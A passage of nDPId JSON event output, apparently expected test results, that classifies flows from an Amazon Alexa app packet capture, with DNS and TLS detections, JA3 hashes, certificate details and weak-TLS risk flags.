00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976195980,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.62.115"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195983,"flow_last_seen":1490976195983,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195983,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1490976195983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195983,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8wa5AAEAGL16sECrYNFQ+c6O4AbsdU0twAAAAAKAC\/\/9kRAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195984,"flow_last_seen":1490976195984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195984,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1490976195984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195984,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8CnNAAEAG5pmsECrYNFQ+c6O5Abv6a4CtAAAAAKAC\/\/9R7QAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2867,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195985,"flow_last_seen":1490976195985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195985,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2867,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1490976195985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195985,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MZ1AAEAGv2+sECrYNFQ+c6O6AbtYObtDAAAAAKAC\/\/+5iAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1490976196000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196000,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7kDZGUl+muArqAScSCFQwAAAgQFtAQCCAps+oX0APaK3gEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1490976196001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196001,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7jUvy2sHVNLcaAScSD3DwAAAgQFtAQCCAps+oycAPaK3gEDAwg="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1490976196002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196002,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0CnRAAEAG5qCsECrYNFQ+c6O5Abv6a4CuA2RlJoAQAVcj2AAAAQEICgD2iuBs+oX0"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1490976196003,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196003,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0wa9AAEAGL2WsECrYNFQ+c6O4AbsdU0tx1L8trYAQAVeVpAAAAQEICgD2iuBs+oyc"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1490976196008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196008,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7r33SsOWDm7RKAScSApGwAAAgQFtAQCCAps+o9VAPaK3gEDAwg="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1490976196009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MZ5AAEAGv3asECrYNFQ+c6O6AbtYObtE990rD4AQAVfHrwAAAQEICgD2iuBs+o9V"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196016,"flow_last_seen":1490976196016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196016,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1490976196016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196016,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8LWlAAEAG4smsECrYNu8csuLAAbtkEKeIAAAAAKAC\/\/+hiQAAAgQFtAQCCAoA9orhAAAAAAEDAwg="} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2910,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1490976196075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976196075,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIa5AAOcGR5A27xyyrBAq2AG74sBbwNFvZBCniXASH\/4cPAAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2911,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1490976196075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976196075,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoLWpAAEAG4tysECrYNu8csuLAAbtkEKeJW8DRcFAQAVdmrQAA"} -00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01107{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1490976071286,"flow_last_seen":1490976075975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8626,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071349,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4754,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071380,"flow_last_seen":1490976075949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6831,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976071385,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":675,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976071583,"flow_last_seen":1490976075957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196223,"flow_last_seen":1490976196223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196223,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 